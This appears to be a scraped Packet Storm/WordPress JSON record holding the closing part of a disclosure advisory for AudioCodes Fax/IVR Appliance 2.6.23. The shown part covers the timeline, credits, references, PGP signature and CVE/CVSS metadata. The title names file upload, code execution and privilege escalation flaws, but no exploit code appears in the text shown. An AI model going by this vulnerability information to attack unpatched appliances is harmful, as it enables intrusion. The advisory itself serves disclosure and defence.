Follow-up email sent to AudioCodes PSIRT stating that I did not receive any answer, CVEs or working patches. I requested an official response regarding the vulnerabilities.\\n * Sep, 17, 2025: AudioCodes PSIRT forwarded my email to two AudioCodes employees and asked them to assist me.\\n * Nov 19, 2025: Vulncheck assigned CVEs.\\n * Nov 20, 2025: A security advisory is published.\\n \\n \\n \\n ## Credits\\n \\n These vulnerabilities were found by Pierre Barre aka Pierre Kim (@PierreKimSec).\\n \\n \\n \\n ## References\\n \\n https:\/\/pierrekim.github.io\/blog\/2025-11-20-audiocodes-fax-ivr-8-vulnerabilities.html\\n \\n https:\/\/pierrekim.github.io\/advisories\/2025-audiocodes-fax-ivr.txt\\n \\n \\n \\n ## Disclaimer\\n \\n This advisory is licensed under a Creative Commons Attribution Non-Commercial\\n Share-Alike 3.0 License: http:\/\/creativecommons.org\/licenses\/by-nc-sa\/3.0\/\\n \\n The source code snippets in this security advisory are the intellectual property of Audiocodes and\\n used to explain the root causes of the vulnerabilities.\\n \\n —–BEGIN PGP SIGNATURE—–\\n \\n iQIzBAEBCgAdFiEEoSgI9MSrzxDXWrmCxD4O2n2TLbwFAmke5JIACgkQxD4O2n2T\\n LbxJ8g\/9EmLiidaYT2zbNgslQ5SueFvOee1D\/3zA3YwBHDIde4VpXqyS\/qgk8IrQ\\n w2OI3zfkbh10\/mWvBwSeeSDX\/IIggoo0aL\/SRMBNNPWhZY8rS5rEUoxCsHLA4Iiv\\n Kod5W9v+4XIfLta8HQiFN5kQF6SawlmFRNWmBcCcDpzvK4NFyekjV3Zn+3aMJspz\\n ghRAQ4YwoCOIDoZZeQzZJj7dAVMvPf5++WLVGyRj0umR4HAgTsk5CdeTqYppYx\/7\\n 301HOlc7ueKcgkPTvwW44fNZ0CtjblX+Vmkm+LTEgz0vO3ijTvWhYbWagZr98ug6\\n m88I\/LAcpMk5TI2IamvMAwfTfNhchyT3QoGucv+ccwRoAzhMqtm9TTAjtezYnND\/\\n eOdg749HzB\/mrNi0w1A6Qgpf9YvBQgsLpvXKpXUa4eaMsyxuy+lLY7O11W8mAAFA\\n J655HEvlHjghlD3tWpAmI2Lo90Ha19MsFVSaaWFFs5elogu5l0QcVgZw5jpyIPRj\\n AdBfS9H3NX25tjRf5SZ25Bf7f8IHqEsEkXzh41mpGPgzLIaPITJdchCw4jIigftI\\n 1HPk+OBThyKPOPyYrNhDcXkEqaLBR5moBYF5ljbd4AYxzba9AQki7qVksbOGkfIz\\n rYyww+0OeEzXJcKSBscTgvIOOyMnNRqAZDdOkdjYD44vwjmQmrY=\\n =gXvT\\n —–END PGP SIGNATURE—–“,”sourceHref”:”https:\/\/packetstorm.news\/download\/211819″,”cvss”:{“score”:10,”severity”:”HIGH”,”vector”:”AV:N\/AC:L\/Au:N\/C:C\/I:C\/A:C”,”version”:”2.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/211819\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-11-20T17:14:05″,”description”:”AudioCodes Fax\/IVR…”,”published”:”2025-11-20T00:00:00″,”modified”:”2025-11-20T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 AudioCodes Fax\/IVR Appliance 2.6.23 File Upload \/ Code Execution \/ Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:211819″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2014-9222″,”CVE-2025-34328″,”CVE-2025-34329″,”CVE-2025-34330″,”CVE-2025-34331″,”CVE-2025-34332″,”CVE-2025-34333″,”CVE-2025-34334″,”CVE-2025-34335″],”sourceData”:”—–BEGIN PGP SIGNED MESSAGE—–\\n Hash: SHA512\\n \\n ## Advisory Information\\n \\n Title:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,36,12,15,13,53,7,11,5],"class_list":["post-27004","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n